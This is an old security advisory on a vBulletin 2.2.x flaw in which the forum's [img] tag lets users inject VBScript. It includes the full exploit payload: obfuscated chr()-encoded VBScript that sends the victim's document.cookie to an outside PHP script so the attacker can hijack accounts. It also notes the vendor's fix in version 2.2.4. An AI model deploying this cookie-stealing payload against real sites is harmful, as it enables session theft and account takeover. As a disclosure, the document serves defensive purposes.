COMMAND

	vBulletin account hijacking using [IMG] tag

SYSTEMS AFFECTED

	 2.2.2 & 2.2.1 & maybe olders

	

PROBLEM

	Cano2 [http://www.buhaboard.de] found following, regarding vBulletin,  a
	web forums package written in PHP.
	

	There is a vulnerability in the vBulletins\'s [img]-Tag  implementation,
	that allows users to inject  vbs-code  in  posts  and  private  messages
	([img] is switched on by default). Through that, an attacker is able  to
	steal other users cookies and maybe hijack their accounts.
	

	The  following  code  sends  the  user\'s   cookie   to   a   php-script
	(http://www.ignite.barrysworld.net/test.php?c= in this case, which  just
	prints it back to the browser) It is enclosed in [code]-Tag, the url  is
	encoded in ascii and linebreaks are inserted to avoid filtering of  some
	characters and insertion of <br>-Tags
	

	

	[code][img]vbscript:location.replace(

	chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+

	chr(47)+chr(47)+chr(119)+chr(119)+chr(119)+

	chr(46)+chr(105)+chr(103)+chr(110)+chr(105)+

	chr(116)+chr(101)+chr(46)+chr(98)+chr(97)+

	chr(114)+chr(114)+chr(121)+chr(115)+chr(119)+

	chr(111)+chr(114)+chr(108)+chr(100)+chr(46)+

	chr(110)+chr(101)+chr(116)+chr(47)+chr(116)+

	chr(101)+chr(115)+chr(116)+chr(46)+chr(112)+

	chr(104)+chr(112)+chr(63)+chr(99)+chr(61)+

	escape(document.cookie)

	)[/img][/code]

	

	

SOLUTION

	Jelsoft claimed to have  made  a  patch  \"which  clamps  down  on  what
	characters are allowed in an [img] tag,  as  well  as  requiring  it  to
	start with http://\".
	

	Patched in last version (2.2.4).